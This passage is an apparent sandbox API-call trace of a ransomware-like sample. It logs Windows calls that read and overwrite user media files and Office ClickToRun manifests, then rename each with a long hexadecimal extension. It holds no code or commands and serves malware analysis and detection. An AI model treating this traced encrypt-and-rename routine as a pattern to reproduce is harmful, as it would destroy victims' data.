GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.894] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.895] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.903] ReadFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0123.903] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.909] ReadFile (in: hFile=0x33c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.909] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.916] ReadFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0123.916] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0123.917] WriteFile (in: hFile=0x334, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0123.928] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0124.971] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0124.972] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a", lpString2=".A493F5C214F48CD8156AC248F1ADBB687F1CFFB382C5FC1DBACEBB09F0CD1E7D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a.A493F5C214F48CD8156AC248F1ADBB687F1CFFB382C5FC1DBACEBB09F0CD1E7D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a.A493F5C214F48CD8156AC248F1ADBB687F1CFFB382C5FC1DBACEBB09F0CD1E7D" [0124.972] GetProcessHeap () returned 0x600000 [0124.972] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3153538 [0124.972] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x27fff60, FileInformation=0x3153538, Length=0x124, FileInformationClass=0xa) returned 0x0 [0124.973] CloseHandle (hObject=0x328) returned 1 [0124.974] GetProcessHeap () returned 0x600000 [0124.974] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0124.976] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0124.979] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.980] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0125.517] WriteFile (in: hFile=0x334, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0125.518] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0125.532] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0125.533] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4", lpString2=".EAA2AFCB8C2C4A0B9FB414E1A54B8291F16E42480C2753899FC71C9850B1F52A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4.EAA2AFCB8C2C4A0B9FB414E1A54B8291F16E42480C2753899FC71C9850B1F52A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4.EAA2AFCB8C2C4A0B9FB414E1A54B8291F16E42480C2753899FC71C9850B1F52A" [0125.533] GetProcessHeap () returned 0x600000 [0125.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x31555d8 [0125.533] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x27fff60, FileInformation=0x31555d8, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0125.535] CloseHandle (hObject=0x334) returned 1 [0125.536] GetProcessHeap () returned 0x600000 [0125.536] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0125.536] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0125.538] ReadFile (in: hFile=0x338, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0125.538] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0125.539] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0125.540] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv", lpString2=".624FA887879401F8ACFCAAD4234619324ADC9C6B024C3F5020B7DDCCFE8B597B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv.624FA887879401F8ACFCAAD4234619324ADC9C6B024C3F5020B7DDCCFE8B597B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv.624FA887879401F8ACFCAAD4234619324ADC9C6B024C3F5020B7DDCCFE8B597B" [0125.540] GetProcessHeap () returned 0x600000 [0125.540] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x31183f0 [0125.540] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x27fff60, FileInformation=0x31183f0, Length=0x116, FileInformationClass=0xa) returned 0x0 [0125.541] CloseHandle (hObject=0x338) returned 1 [0125.541] GetProcessHeap () returned 0x600000 [0125.541] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0125.541] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0125.557] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0125.558] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi", lpString2=".8C2D328070673BBDDAE086D0A299D5C59BC8A8121BA536394E9E07964190FD39" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi.8C2D328070673BBDDAE086D0A299D5C59BC8A8121BA536394E9E07964190FD39") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\R6WzPWe11 LXUF-PbV.avi.8C2D328070673BBDDAE086D0A299D5C59BC8A8121BA536394E9E07964190FD39" [0125.558] GetProcessHeap () returned 0x600000 [0125.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3157178 [0125.558] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x27fff60, FileInformation=0x3157178, Length=0x124, FileInformationClass=0xa) returned 0x0 [0125.559] CloseHandle (hObject=0x31c) returned 1 [0125.560] GetProcessHeap () returned 0x600000 [0125.560] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.562] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff) Thread: id = 121 os_tid = 0xc34 [0091.021] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0104.944] ReadFile (in: hFile=0x328, lpBuffer=0x3133458, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3113320 | out: lpBuffer=0x3133458*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3113320) returned 1 [0104.944] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0104.944] WriteFile (in: hFile=0x328, lpBuffer=0x3133458*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3113320 | out: lpBuffer=0x3133458*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3113320) returned 1 [0104.945] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0104.948] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x31133d0, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x31133d0, ReturnLength=0x28fff70) returned 0x0 [0104.949] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", lpString2=".C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456" [0104.949] GetProcessHeap () returned 0x600000 [0104.949] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x212) returned 0x63ce70 [0104.949] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x63ce70, Length=0x212, FileInformationClass=0xa) returned 0x0 [0104.950] CloseHandle (hObject=0x328) returned 1 [0104.953] GetProcessHeap () returned 0x600000 [0104.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3113320 | out: hHeap=0x600000) returned 1 [0104.955] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.113] ReadFile (in: hFile=0x30c, lpBuffer=0x6d54c0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b5388 | out: lpBuffer=0x6d54c0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b5388) returned 1 [0105.113] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.114] WriteFile (in: hFile=0x30c, lpBuffer=0x6d54c0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b5388 | out: lpBuffer=0x6d54c0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b5388) returned 1 [0105.114] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.115] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b5438, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b5438, ReturnLength=0x28fff70) returned 0x0 [0105.115] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", lpString2=".983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B" [0105.115] GetProcessHeap () returned 0x600000 [0105.115] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1fc) returned 0x6b45a8 [0105.116] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x28fff60, FileInformation=0x6b45a8, Length=0x1fc, FileInformationClass=0xa) returned 0x0 [0105.116] CloseHandle (hObject=0x30c) returned 1 [0105.218] GetProcessHeap () returned 0x600000 [0105.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b5388 | out: hHeap=0x600000) returned 1 [0105.232] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.241] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0105.243] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml", lpString2=".AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63" [0105.243] GetProcessHeap () returned 0x600000 [0105.243] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a0) returned 0x30f04b8 [0105.243] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x30f04b8, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0105.245] CloseHandle (hObject=0x31c) returned 1 [0105.250] GetProcessHeap () returned 0x600000 [0105.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0105.251] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.254] ReadFile (in: hFile=0x308, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0105.255] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.255] WriteFile (in: hFile=0x308, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0105.256] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.294] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x28fff70) returned 0x0 [0105.295] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2=".4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F" [0105.295] GetProcessHeap () returned 0x600000 [0105.295] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a6) returned 0x30f0660 [0105.296] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x30f0660, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0105.297] CloseHandle (hObject=0x308) returned 1 [0105.303] GetProcessHeap () returned 0x600000 [0105.303] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0105.304] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.308] ReadFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0105.309] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.309] WriteFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0105.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.311] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0105.311] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2=".05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.05ABD055F321C1F455A19FCEA61C49F0F03B7E9783890E5B8B5984881E3DBC56" [0105.311] GetProcessHeap () returned 0x600000 [0105.311] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ac) returned 0x30f0810 [0105.312] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x30f0810, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0105.314] CloseHandle (hObject=0x31c) returned 1 [0105.318] GetProcessHeap () returned 0x600000 [0105.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0105.320] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.327] ReadFile (in: hFile=0x31c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.328] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.329] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x28fff70) returned 0x0 [0105.330] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml", lpString2=".9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml.9C7C59AF708A7CF4E2811D636746B9151BFAB3F62A1639E894F634E643BBC829" [0105.330] GetProcessHeap () returned 0x600000 